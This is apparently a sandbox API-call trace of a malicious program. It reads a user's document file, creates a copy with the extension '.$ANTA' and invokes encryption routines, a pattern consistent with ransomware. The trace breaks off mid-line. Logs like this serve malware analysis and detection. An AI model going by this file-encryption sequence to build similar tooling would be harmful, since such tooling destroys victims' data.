1 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0080.058] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\ltd44h.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0080.058] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.058] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0080.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0080.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0080.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0080.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0080.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0080.058] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0080.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0080.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0080.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0080.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0080.059] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0080.059] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0080.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0080.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0080.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0080.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a46a0 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359860 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a46a0 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359860 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0080.060] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb")) returned 0x10 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0080.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0080.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0080.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0080.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0080.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\lTD44h.ots.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\ltd44h.ots.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0080.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0080.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0080.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0080.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0080.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0080.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0080.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0080.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0080.061] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0080.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0080.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0080.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0080.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0080.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0080.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0080.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0080.062] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0080.062] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0080.062] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0080.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0080.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0080.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0080.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0080.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0080.065] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0080.065] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ea78*=0xbca0, lpOverlapped=0x0) returned 1 [0080.066] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0080.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0080.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0080.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbca0) returned 0x499a008 [0080.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0080.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0080.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0080.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0080.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0080.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0080.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbca0) returned 0x49a5cb0 [0080.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.070] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbca0) returned 0x499a008 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0080.070] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0080.070] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0080.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0080.070] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0080.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbca0) returned 0x499a008 [0080.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2860 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0080.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0080.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27c0 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0080.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0080.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbca0) returned 0x49b1958 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0080.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0080.072] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0080.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0080.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0080.072] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0080.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0080.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0080.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0080.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0080.073] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0080.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0080.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 